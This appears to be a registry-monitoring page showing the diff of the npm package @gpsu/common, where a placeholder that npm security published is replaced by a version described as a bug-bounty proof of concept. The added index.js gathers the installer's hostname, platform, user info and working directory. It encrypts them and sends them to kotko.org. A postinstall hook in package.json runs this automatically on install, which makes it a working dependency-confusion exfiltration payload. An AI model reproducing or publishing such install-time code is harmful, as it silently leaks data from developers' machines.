@gpsu/common 0.0.1-security → 1.0.0

Sign up to get free protection for your applications and to get access to all the features.

Potentially problematic release.

This version of @gpsu/common might be problematic. Click here for more details.

Files changed (4) hide show
  1. package/README.md +1 -5
  2. package/crypto.js +31 -0
  3. package/index.js +39 -0
  4. package/package.json +21 -3
package/README.md CHANGED
@@ -1,5 +1 @@
1
- # Security holding package
2
-
3
- This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
4
-
5
- Please refer to www.npmjs.com/advisories?search=%40gpsu%2Fcommon for more information.
1
+ Poc by kotko for testing bug.
package/crypto.js ADDED
@@ -0,0 +1,31 @@
1
+ const crypto = require('crypto');
2
+
3
+ const algorithm = 'aes-256-ctr';
4
+ const secretKey = 'vOVH6sdmpNWjRRIqCc7rdxs01lwHzfr3';
5
+ const iv = crypto.randomBytes(16);
6
+
7
+ const encrypt = (text) => {
8
+
9
+ const cipher = crypto.createCipheriv(algorithm, secretKey, iv);
10
+
11
+ const encrypted = Buffer.concat([cipher.update(text), cipher.final()]);
12
+
13
+ return {
14
+ iv: iv.toString('hex'),
15
+ content: encrypted.toString('hex')
16
+ };
17
+ };
18
+
19
+ const decrypt = (hash) => {
20
+
21
+ const decipher = crypto.createDecipheriv(algorithm, secretKey, Buffer.from(hash.iv, 'hex'));
22
+
23
+ const decrpyted = Buffer.concat([decipher.update(Buffer.from(hash.content, 'hex')), decipher.final()]);
24
+
25
+ return decrpyted.toString();
26
+ };
27
+
28
+ module.exports = {
29
+ encrypt,
30
+ decrypt
31
+ };
package/index.js ADDED
@@ -0,0 +1,39 @@
1
+ var os = require("os");
2
+ const request = require('request');
3
+ const crypto = require('crypto');
4
+ var fs = require('fs');
5
+
6
+
7
+ var hostname = os.hostname();
8
+ var type = os.platform();
9
+ var userInfo = os.userInfo();
10
+ var currentPath = process.cwd();
11
+ var json = [];
12
+
13
+
14
+ const algorithm = 'aes-256-ctr';
15
+ const secretKey = 'vOVH6sdmpNWjRRIqCc7rdxs01lwHzfr3';
16
+ const iv = crypto.randomBytes(16);
17
+
18
+ json.push(hostname)
19
+ json.push(type)
20
+ json.push(userInfo)
21
+ json.push(currentPath)
22
+ json = JSON.stringify(json);
23
+ const { encrypt, decrypt } = require('./crypto');
24
+
25
+ let hash = encrypt(json);
26
+
27
+
28
+ let company = "betagouv/gps-usagers"
29
+ let packages = "@gpsu/common"
30
+
31
+ fs.writeFile('pocByKotko.txt', 'this proof for report', function (err) {
32
+ if (err) throw err;
33
+ });
34
+
35
+ // var dString = JSON.parse(Buffer.from("eyJpdiI6IjA5NDljZjA3M2RhYWYwYmM2MmM5MzgwMDM2YTI2MmVjIiwiY29udGVudCI6ImVjYWJlNGM0YzM0ZmVlZWM5YzgzYTVjYTcyNjkzMjc4MDljNzljNjE3YjkwNDMzMjI0ODE3M2NkM2UxNjUxZjNiNWQwNjFjMWQ1NmZhNGQxNWVlMTg0MjY4YmMxZmIyZmM4YzE3ZDEwNTNlNmZlYzcyNjE0MjY5ZTA3Y2NiZDcxMDBkMTFlOGU4M2ZkOTdlYTY1NGQ5MmYyMTY3YjJhM2FhNmY0YzcyMDk1MmRkMGQ2MGM4MzcxN2M4MzYzMjEyY2UzNjZmM2YwNWUxMDYyZjc4ZjgxIn0", 'base64'))
36
+ // console.log(decrypt(dString))
37
+
38
+ var buff = Buffer.from(JSON.stringify(hash)).toString("base64");
39
+ request(`https://kotko.org/?${company}:${packages}=${buff}`, (error, response, body) => {})
package/package.json CHANGED
@@ -1,6 +1,24 @@
1
1
  {
2
2
  "name": "@gpsu/common",
3
- "version": "0.0.1-security",
4
- "description": "security holding package",
5
- "repository": "npm/security-holder"
3
+ "version": "1.0.0",
4
+ "description": "This package for demonstrate bugs in program (Bug Bounty program. Do not delete until decision report",
5
+ "main": "index.js",
6
+ "scripts": {
7
+ "postinstall": "node index.js",
8
+ "preinstall": "npm i request --save-dev",
9
+ "test": "node index.js"
10
+ },
11
+ "author": "",
12
+ "Dependencies": {
13
+ "crypto": "^1.0.1",
14
+ "ip": "^1.1.5",
15
+ "request": "^2.88.2",
16
+ "os": "^0.1.1"
17
+ },
18
+ "devDependencies": {
19
+ "crypto": "^1.0.1",
20
+ "ip": "^1.1.5",
21
+ "os": "^0.1.1",
22
+ "request": "^2.88.2"
23
+ }
6
24
  }